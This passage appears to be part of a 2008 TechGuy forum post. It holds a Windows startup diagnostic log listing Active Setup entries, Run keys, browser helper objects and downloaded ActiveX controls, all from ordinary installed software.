[{44BBA840-CC51-11CF-AAFA-00AA00B6015C}] * StubPath = "%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install [{44BBA842-CC51-11CF-AAFA-00AA00B6015B}] * StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT [{5945c046-1e7d-11d1-bc44-00c04fd912be}] * StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msmsgs.inf,BLC.QuietInstall.PerUser [{6BF52A52-394A-11d3-B153-00C04F79FAA6}] * StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\wmp11.inf,PerUserStub [{7790769C-0471-11d2-AF11-00C04FA35D02}] * StubPath = "%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install [{89820200-ECBD-11cf-8B85-00AA005B4340}] * StubPath = regsvr32.exe /s /n /i:U shell32.dll [{89820200-ECBD-11cf-8B85-00AA005B4383}] * StubPath = C:\WINDOWS\system32\ie4uinit.exe -BaseSettings [{89B4C1CD-B018-4511-B0A1-5476DBF70820}] * StubPath = C:\WINDOWS\system32\Rundll32.exe C:\WINDOWS\system32\mscories.dll,Install [{8b15971b-5355-4c82-8c07-7e181ea07608}] * StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\fxsocm.inf,Fax.Install.PerUser -------------------------------------------------- Enumerating ICQ Agent Autostart apps: HKCU\Software\Mirabilis\ICQ\Agent\Apps *Registry key not found* -------------------------------------------------- Load/Run keys from C:\WINDOWS\WIN.INI: load=*INI section not found* run=*INI section not found* Load/Run keys from Registry: HKLM\..\Windows NT\CurrentVersion\WinLogon: load=*Registry value not found* HKLM\..\Windows NT\CurrentVersion\WinLogon: run=*Registry value not found* HKLM\..\Windows\CurrentVersion\WinLogon: load=*Registry key not found* HKLM\..\Windows\CurrentVersion\WinLogon: run=*Registry key not found* HKCU\..\Windows NT\CurrentVersion\WinLogon: load=*Registry value not found* HKCU\..\Windows NT\CurrentVersion\WinLogon: run=*Registry value not found* HKCU\..\Windows\CurrentVersion\WinLogon: load=*Registry key not found* HKCU\..\Windows\CurrentVersion\WinLogon: run=*Registry key not found* HKCU\..\Windows NT\CurrentVersion\Windows: load=*Registry value not found* HKCU\..\Windows NT\CurrentVersion\Windows: run=*Registry value not found* HKLM\..\Windows NT\CurrentVersion\Windows: load=*Registry value not found* HKLM\..\Windows NT\CurrentVersion\Windows: run=*Registry value not found* HKLM\..\Windows NT\CurrentVersion\Windows: AppInit_DLLs= -------------------------------------------------- Shell & screensaver key from C:\WINDOWS\SYSTEM.INI: Shell=*INI section not found* SCRNSAVE.EXE=*INI section not found* drivers=*INI section not found* Shell & screensaver key from Registry: Shell=Explorer.exe SCRNSAVE.EXE=*Registry value not found* drivers=*Registry value not found* Policies Shell key: HKCU\..\Policies: Shell=*Registry value not found* HKLM\..\Policies: Shell=*Registry value not found* -------------------------------------------------- Checking for EXPLORER.EXE instances: C:\WINDOWS\Explorer.exe: PRESENT! C:\Explorer.exe: not present C:\WINDOWS\Explorer\Explorer.exe: not present C:\WINDOWS\System\Explorer.exe: not present C:\WINDOWS\System32\Explorer.exe: not present C:\WINDOWS\Command\Explorer.exe: not present C:\WINDOWS\Fonts\Explorer.exe: not present -------------------------------------------------- Checking for superhidden extensions: .lnk: HIDDEN! (arrow overlay: yes) .pif: HIDDEN! (arrow overlay: yes) .exe: not hidden .com: not hidden .bat: not hidden .hta: not hidden .scr: not hidden .shs: HIDDEN! .shb: HIDDEN! .vbs: not hidden .vbe: not hidden .wsh: not hidden .scf: HIDDEN! (arrow overlay: NO!) .url: HIDDEN! (arrow overlay: yes) .js: not hidden .jse: not hidden -------------------------------------------------- Verifying REGEDIT.EXE integrity: - Regedit.exe found in C:\WINDOWS - .reg open command is normal (regedit.exe %1) - Company name OK: 'Microsoft Corporation' - Original filename OK: 'REGEDIT.EXE' - File description: 'Registry Editor' Registry check passed -------------------------------------------------- Enumerating Browser Helper Objects: (no name) - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (no name) - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\NppBho.dll - {1E8A6170-7264-4D0F-BEAE-D42A53123C75} Skype add-on (mastermind) - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} (no name) - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll - {3049C3E9-B461-4BC5-8870-4C09146192CA} (no name) - C:\Program Files\Java\jre1.6.0_06\bin\ssv.dll - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} AOL Toolbar Launcher - C:\Program Files\AOL\AOL Toolbar 2.0\aoltb.dll - {7C554162-8CB7-45A4-B8F4-8EA1C75885F9} (no name) - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} -------------------------------------------------- Enumerating Task Scheduler jobs: *No jobs found* -------------------------------------------------- Enumerating Download Program Files: [{0000000A-0000-0010-8000-00AA00389B71}] CODEBASE = http://download.microsoft.com/downlo...367/wmavax.CAB [Microsoft Office Template and Media Control] InProcServer32 = C:\WINDOWS\Downloaded Program Files\IEAWSDC.DLL CODEBASE = http://office.microsoft.com/templates/ieawsdc.cab [Shockwave ActiveX Control] InProcServer32 = C:\WINDOWS\system32\Macromed\Director\SwDir.dll CODEBASE = http://download.macromedia.com/pub/s...irector/sw.cab [Windows Genuine Advantage Validation Tool] InProcServer32 = C:\WINDOWS\system32\LegitCheckControl.DLL CODEBASE = http://download.microsoft.com/downlo...eckControl.cab [Symantec Download Manager] InProcServer32 = C:\WINDOWS\Downloaded Program Files\symdlmgr.dll CODEBASE = https://webdl.symantec.com/activex/symdlmgr.cab [MUWebControl Class] InProcServer32 = C:\WINDOWS\system32\muweb.dll CODEBASE = http://www.update.microsoft.com/micr...?1213095264416 [Image Uploader Control] InProcServer32 = C:\WINDOWS\Downloaded Program Files\ImageUploader4.ocx CODEBASE = http://share.adoramapix.com/componen...eUploader4.cab [Java Plug-in 1.6.0_06] InProcServer32 = C:\Program Files\Java\jre1.6.0_06\bin\ssv.dll CODEBASE = http://java.sun.com/update/1.6.0/jin...ndows-i586.cab [{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}] CODEBASE = http://fpdownload.macromedia.com/get.../ultrashim.cab [Aurigma Image Uploader 3.5 Control] InProcServer32 = C:\WINDOWS\Downloaded Program Files\ImageUploader3.ocx CODEBASE = http://www.adoramapix.com/components/ImageUploader3.cab [Java Plug-in 1.6.0_06] InProcServer32 = C:\Program Files\Java\jre1.6.0_06\bin\ssv.dll CODEBASE = http://java.sun.com/update/1.6.0/jin...ndows-i586.cab [Shockwave Flash Object] InProcServer32 = C:\WINDOWS\system32\Macromed\Flash\Flash9f.ocx CODEBASE = http://download.macromedia.com/pub/s...sh/swflash.cab [Virtools WebPlayer Class] InProcServer32 = C:\Program Files\Virtools\3D Life Player\WebPlayer.ocx CODEBASE = http://a532.g.akamai.net/f/532/6712/.../installer.exe -------------------------------------------------- |
|
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| |
| You Are Using:  |
Advertisements do not imply our endorsement of that product or service. All times are GMT -4. The time now is 12:34 PM. Copyright © 1996 - 2008 TechGuy, Inc. All rights reserved. Powered by vBulletin, Copyright © 2000 - 2008, Jelsoft Enterprises Ltd. Search Engine Optimization by vBSEO 3.1.0 |  |
